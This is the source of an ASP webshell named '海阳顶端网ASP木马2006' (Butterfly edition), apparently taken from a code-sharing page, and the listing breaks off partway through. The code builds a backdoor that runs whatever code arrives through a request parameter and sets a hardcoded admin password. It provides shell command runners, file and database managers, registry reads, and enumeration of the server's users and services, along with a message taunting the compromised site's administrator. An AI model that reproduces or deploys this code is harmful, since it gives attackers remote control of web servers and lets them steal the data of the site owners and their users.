📄 hu.asp
字号:
<obje_Litect runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat="server" id="ws" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<object runat="server" id="sa" scope="page" classid="clsid:13709620-C279-11CE-A49E-444553540000"></object>
<%
' Option Explicit
Dim theAct, sTime, aspPath, pageName, strBackDoor, fsoX, saX, wsX
sTime = Timer
theAct= Request("theAct")
pageName = Request("pageName")
aspPath = Replace(Server.MapPath(".") & "\~86.tmp", "\\", "\") ''系统临时文件
strBackDoor = "<script language=vbscript runat=server>"
strBackDoor = strBackDoor & "If Request(""" & clientPassword & """)<>"""" Then Session(""#"")=Request(""" & clientPassword & """)" & VbNewLine
strBackDoor = strBackDoor & "If Session(""#"")<>"""" Then Execute(Session(""#""))"
strBackDoor = strBackDoor & "</script>" ''插入的后门代码
Const m = "HYTop2006" ''自定义Session前缀
Const showLogin = "" ''为空直接显示登录界面,否则用"?pageName=它的值"来进行访问
Const clientPassword = "#" ''插入后门的密码,如果要插入数据库中,只能为一个字符.
Const dbSelectNumber = 10 ''数据库操作时默认从表中选取的数据量
Const isDebugMode = False ''是否调试模式
Const myName = "The butterfly has come" ''登录页按扭上的文字
Const notdownloadsExists = False ''原ACCESS数据库中是否存在notdownloadsExists表
Const userPassword = "123" ''管理密码
Const myCmdDotExeFile = "command.com" ''定义cmd.exe文件的文件名
Const strJsCloseMe = "<input type=button value=' 关闭 ' onclick='window.close();'>"
Sub createIt(fsoX, saX, wsX)
If isDebugMode = False Then
On Error Resume Next
End If
Set fsoX = Server.CreateObject("Scripting.FileSystemObject")
If IsEmpty(fsoX) And (pageName = "FsoFileExplorer" Or theAct = "fsoSearch") Then
Set fsoX = fso
End If
Set saX = Server.CreateObject("Shell.Application")
If IsEmpty(saX) And (pageName = "AppFileExplorer" Or pageName = "SaCmdRun" Or theAct = "saSearch") Then
Set saX = sa
End If
Set wsX = Server.CreateObject("WScript.Shell")
If IsEmpty(wsX) And (pageName = "WsCmdRun" Or theAct = "getTerminalInfo" Or theAct = "readReg") Then
Set wsX = ws
End If
If Err Then
Err.Clear
End If
End Sub
Sub chkErr(Err)
If Err Then
echo "<style>body{margin:8;border:none;overflow:hidden;background-color:buttonface;}</style>"
echo "<br/><font size=2><li>错误: " & Err.Description & "</li><li>错误源: " & Err.Source & "</li><br/>"
echo "<hr>Powered By butterfly</font>"
Err.Clear
Response.End
End If
End Sub
Sub echo(str)
Response.Write(str)
End Sub
Sub isIn()
If pageName <> "" And PageName <> "login" And PageName <> showLogin Then
If Session(m & "userPassword") <> userPassword Then
Response.End
End If
End If
End Sub
Sub showTitle(str)
echo "<title>" & str & " - 海阳顶端网ASP木马2006 - Butterfly Special-purpose</title>" & vbNewLine
echo "<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>" & vbNewLine
echo "<!--" & vbNewLine
echo "=Sorry=====================================================" & vbNewLine
echo "I did not do it on purpose" & vbNewLine
echo "I did not do it on purpose" & vbNewLine
echo "THANKS" & vbNewLine
echo "==============================================================" & vbNewLine & vbNewLine
echo "=Message of the butterfly =====================================================" & vbNewLine
echo "Your websites are leaky" & vbNewLine
echo "Otherwise it is impossible for me to come in" & vbNewLine
echo "The administrator mends quickly" & vbNewLine
echo "Otherwise your websites don't open" & vbNewLine
echo "All right will not say Sudden strain of a muscle" & vbNewLine
echo "==============================================================" & vbNewLine
echo "-->" & vbNewLine
PageOther()
End Sub
Function fixNull(str)
If IsNull(str) Then
str = " "
End If
fixNull = str
End Function
Function encode(str)
str = Server.HTMLEncode(str)
str = Replace(str, vbNewLine, "<br>")
str = Replace(str, " ", " ")
str = Replace(str, " ", " ")
encode = str
End Function
Function getTheSize(theSize)
If theSize >= (1024 * 1024 * 1024) Then getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G"
If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M"
If theSize >= 1024 And theSize < (1024 * 1024) Then getTheSize = Fix((theSize / 1024) * 100) / 100 & "K"
If theSize >= 0 And theSize <1024 Then getTheSize = theSize & "B"
End Function
Function HtmlEncode(str)
If isNull(str) Then
Exit Function
End If
HtmlEncode = Server.HTMLEncode(str)
End Function
Function UrlEncode(str)
If isNull(str) Then
Exit Function
End If
UrlEncode = Server.UrlEncode(str)
End Function
Sub redirectTo(strUrl)
Response.Redirect(Request.ServerVariables("URL") & strUrl)
End Sub
Function trimThePath(strPath)
If Right(strPath, 1) = "\" And Len(strPath) > 3 Then
strPath = Left(strPath, Len(strPath) - 1)
End If
trimThePath = strPath
End Function
Sub alertThenClose(strInfo)
Response.Write "<script>alert(""" & strInfo & """);window.close();</script>"
End Sub
Sub showErr(str)
Dim i, arrayStr
str = Server.HtmlEncode(str)
arrayStr = Split(str, "$$")
' Response.Clear
echo "<font size=2>"
echo "出错信息:<br/><br/>"
For i = 0 To UBound(arrayStr)
echo " " & (i + 1) & ". " & arrayStr(i) & "<br/>"
Next
echo "</font>"
Response.End
End Sub
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 下面是程序模块选择部分
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
isIn()
Call createIt(fsoX, saX, wsX)
Select Case pageName
Case showLogin, "login"
PageLogin()
Case "PageList"
PageList()
Case "objOnSrv"
PageObjOnSrv()
Case "ServiceList"
PageServiceList()
Case "userList"
PageUserList()
Case "CSInfo"
PageCSInfo()
Case "infoAboutSrv"
PageInfoAboutSrv()
Case "AppFileExplorer"
PageAppFileExplorer()
Case "SaCmdRun"
PageSaCmdRun()
Case "WsCmdRun"
PageWsCmdRun()
Case "FsoFileExplorer"
PageFsoFileExplorer()
Case "MsDataBase"
PageMsDataBase()
Case "OtherTools"
PageOtherTools()
Case "TxtSearcher"
PageTxtSearcher()
Case "PageAddToMdb"
PageAddToMdb()
End Select
Set saX = Nothing
Set wsX = Nothing
Set fsoX = Nothing
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Rem 下面是各独立功能模块
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Sub PageList()
showTitle("功能模块列表")
echo "<base target=_blank>海阳顶端网ASP木马@2006α<hr/><ol>"
echo "<li><a href='?pageName=ServiceList'>系统服务信息</a></li><br/>"
echo "<li><a href='?pageName=infoAboutSrv'>服务器相关数据</a><br/>"
echo "(<a href='?pageName=infoAboutSrv&theAct=getSrvInfo'>系统参数</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getSrvDrvInfo'>系统磁盘</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getSiteRootInfo'>站点文件夹</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getTerminalInfo'>终端端口&自动登录)</a></li><br/>"
echo "<li><a href='?pageName=objOnSrv'>服务器组件探针</a></li><br/>"
echo "<li><a href='?pageName=userList'>系统用户及用户组信息</a></li><br/>"
echo "<li><a href='?pageName=CSInfo'>客户端服务器交互信息</a></li><br/>"
echo "<li><a href='?pageName=WsCmdRun'>WScript.Shell程序运行器cmd.asp</a></li><br/>"
echo "<li><a href='?pageName=SaCmdRun'>Shell.Application程序运行器</a></li><br/>"
echo "<li><a href='?pageName=FsoFileExplorer'>FSO文件浏览操作器</a></li><br/>"
echo "<li><a href='?pageName=AppFileExplorer'>Shell.Application文件浏览操作器</a></li><br/>"
echo "<li><a href='?pageName=MsDataBase'>微软数据库查看/操作器</a></li><br/>"
echo "<li><a href='?pageName=PageAddToMdb'>文件夹打包/解开器</a></li><br/>"
echo "</ol><hr/>Powered By butterfly"
End Sub
Sub PageServiceList()
Dim sa, objService, objComputer
showTitle("系统服务信息查看")
Set objComputer = GetObject("WinNT://.")
Set sa = Server.CreateObject("Shell.Application")
objComputer.Filter = Array("Service")
echo "<ol>"
If isDebugMode = False Then
On Error Resume Next
End If
For Each objService In objComputer
echo "<li>" & objService.Name & "</li><hr/>"
echo "<ol>服务名称: " & objService.Name & "<br/>"
echo "显示名称: " & objService.DisplayName & "<br/>"
echo "启动类型: " & getStartType(objService.StartType) & "<br/>"
echo "运行状态: " & sa.IsServiceRunning(objService.Name) & "<br/>"
' echo "当前状态: " & objService.Status & "<br/>"
' echo "服务类型: " & objService.ServiceType & "<br/>"
echo "登录身份: " & objService.ServiceAccountName & "<br/>"
echo "服务描述: " & getServiceDsc(objService.Name) & "<br/>"
echo "文件路径及参数: " & objService.Path
echo "</ol><hr/>"
Next
echo "</ol><hr/>Powered By butterfly"
Set sa = Nothing
End Sub
Function getServiceDsc(strService)
Dim ws
Set ws = Server.CreateObject("WScript.Shell")
getServiceDsc = ws.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" & strService & "\Description")
Set ws = Nothing
End Function
Function getStartType(num)
Select Case num
Case 2
getStartType = "自动"
Case 3
getStartType = "手动"
Case 4
getStartType = "已禁用"
End Select
End Function
Sub PageInfoAboutSrv()
Dim theAct
theAct = Request("theAct")
showTitle("服务器相关数据")
Select Case theAct
Case ""
getSrvInfo()
getSrvDrvInfo()
getSiteRootInfo()
getTerminalInfo()
Case "getSrvInfo"
getSrvInfo()
Case "getSrvDrvInfo"
getSrvDrvInfo()
Case "getSiteRootInfo"
getSiteRootInfo()
Case "getTerminalInfo"
getTerminalInfo()
End Select
echo "<hr/>Powered By butterfly"
End Sub
Sub getSrvInfo()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, sa, objWshSysEnv, aryExEnvList, strExEnvList, intCpuNum, strCpuInfo, strOS
Set sa = Server.CreateObject("Shell.Application")
strExEnvList = "SystemRoot$WinDir$ComSpec$TEMP$TMP$NUMBER_OF_PROCESSORS$OS$Os2LibPath$Path$PATHEXT$PROCESSOR_ARCHITECTURE$" & _
"PROCESSOR_IDENTIFIER$PROCESSOR_LEVEL$PROCESSOR_REVISION"
aryExEnvList = Split(strExEnvList, "$")
Set objWshSysEnv = wsX.Environment("SYSTEM")
chkErr(Err)
intCpuNum = Request.ServerVariables("NUMBER_OF_PROCESSORS")
If IsNull(intCpuNum) Or intCpuNum = "" Then
intCpuNum = objWshSysEnv("NUMBER_OF_PROCESSORS")
End If
strOS = Request.ServerVariables("OS")
If IsNull(strOS) Or strOS = "" Then
strOS = objWshSysEnv("OS")
strOs = strOs & "(有可能是 Windows2003 哦)"
End If
strCpuInfo = objWshSysEnv("PROCESSOR_IDENTIFIER")
echo "<a href=javascript:showHideMe(srvInf);>服务器相关参数:</a>"
echo "<ol id=srvInf><hr/>"
echo "<li>服务器名: " & Request.ServerVariables("SERVER_NAME") & "</li>"
echo "<li>服务器IP: " & Request.ServerVariables("LOCAL_ADDR") & "</li>"
echo "<li>服务端口: " & Request.ServerVariables("SERVER_PORT") & "</li>"
echo "<li>服务器内存: " & getTheSize(sa.GetSystemInformation("PhysicalMemoryInstalled")) & "</li>"
echo "<li>服务器时间: " & Now & "</li>"
echo "<li>服务器软件: " & Request.ServerVariables("SERVER_SOFTWARE") & "</li>"
echo "<li>脚本超时时间: " & Server.ScriptTimeout & "</li>"
echo "<li>服务器CPU数量: " & intCpuNum & "</li>"
echo "<li>服务器CPU详情: " & strCpuInfo & "</li>"
echo "<li>服务器操作系统: " & strOS & "</li>"
echo "<li>服务器解译引擎: " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion & "</li>"
echo "<li>本文件实际路径: " & Request.ServerVariables("PATH_TRANSLATED") & "</li>"
echo "<hr/></ol>"
echo "<br/><a href=javascript:showHideMe(srvEnvInf);>服务器相关参数:</a>"
echo "<ol id=srvEnvInf><hr/>"
For i = 0 To UBound(aryExEnvList)
echo "<li>" & aryExEnvList(i) & ": " & wsX.ExpandEnvironmentStrings("%" & aryExEnvList(i) & "%") & "</li>"
Next
echo "<hr/></ol>"
Set sa = Nothing
Set objWshSysEnv = Nothing
End Sub
Sub getSrvDrvInfo()
If isDebugMode = False Then
On Error Resume Next
End If
Dim objTheDrive
echo "<br/><a href=javascript:showHideMe(srvDriveInf);>服务器磁盘信息:</a>"
echo "<ol id=srvDriveInf><hr/>"
echo "<div id='fsoDriveList'>"
echo "<span>盘符</span><span>类型</span><span>卷标</span><span>文件系统</span><span>可用空间</span><span>总空间</span><br/>"
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -